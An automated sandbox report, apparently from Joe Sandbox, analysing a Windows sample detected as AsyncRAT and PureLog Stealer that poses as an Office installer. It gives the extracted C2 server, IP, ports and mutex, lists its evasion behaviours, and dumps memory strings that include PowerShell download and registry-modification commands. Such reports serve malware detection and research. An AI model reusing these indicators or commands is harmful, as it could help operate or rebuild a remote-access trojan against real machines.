Windows Analysis Report
Gm602axA2d.exe

Overview

General Information

Sample name: Gm602axA2d.exe
renamed because original name is a hash value
Original sample name: 2d25ca067a272bd8542cabe1ff9985d1.exe
Analysis ID: 1433165
MD5: 2d25ca067a272bd8542cabe1ff9985d1
SHA1: 594fb8d239a5ffaa654a13415fa95965ba47d2a8
SHA256: da3a59fdb9f1414f6d726429c609ea5b6377c9d96d22ffb13f75352eec6be3a4
Tags: AsyncRATexeRAT
Infos:

Detection

AsyncRAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected PureLog Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ProcessChecker
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Gm602axA2d.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://msfree.su/donaties/donations.html Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "5512.sytes.net,95.211.208.153", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "Llg9a02PERRO", "Autorun": "false", "Group": "null"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Virustotal: Detection: 63% Perma Link
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Virustotal: Detection: 63% Perma Link
Multi AV Scanner detection for submitted file
Source: Gm602axA2d.exe ReversingLabs: Detection: 76%
Source: Gm602axA2d.exe Virustotal: Detection: 60% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Gm602axA2d.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Gm602axA2d.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
May infect USB drives
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP
Source: Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 95.211.208.153:7707 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 95.211.208.153:7707 -> 192.168.2.4:49731
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 5512.sytes.net
Yara detected Generic Downloader
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 95.211.208.153:7707
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: powershell.exe, 00000001.00000002.2099977304.00000000089E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AppLaunch.exe, 0000000A.00000002.2916185361.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: AppLaunch.exe, 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab-
Source: powershell.exe, 00000008.00000002.1764715241.000002B401622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mrodevicemgr.officeapps.live.com
Source: powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1764715241.000002B401622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://prod.mrodevicemgr.live.com.akadns.net
Source: powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.vmware.com/0
Source: powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2181412356.0000000007047000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2248433326.0000000007907000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1764715241.000002B40161C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com
Source: powershell.exe, 00000008.00000002.2284007759.000002B46B670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305831877.000002B46B740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData
Source: powershell.exe, 00000008.00000002.2317858397.000002B46D5BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseDataEM32
Source: powershell.exe, 00000008.00000002.2322618080.000002B46D630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/c2rreleasedata
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: https://msfree.su/donaties/donations.html
Source: powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
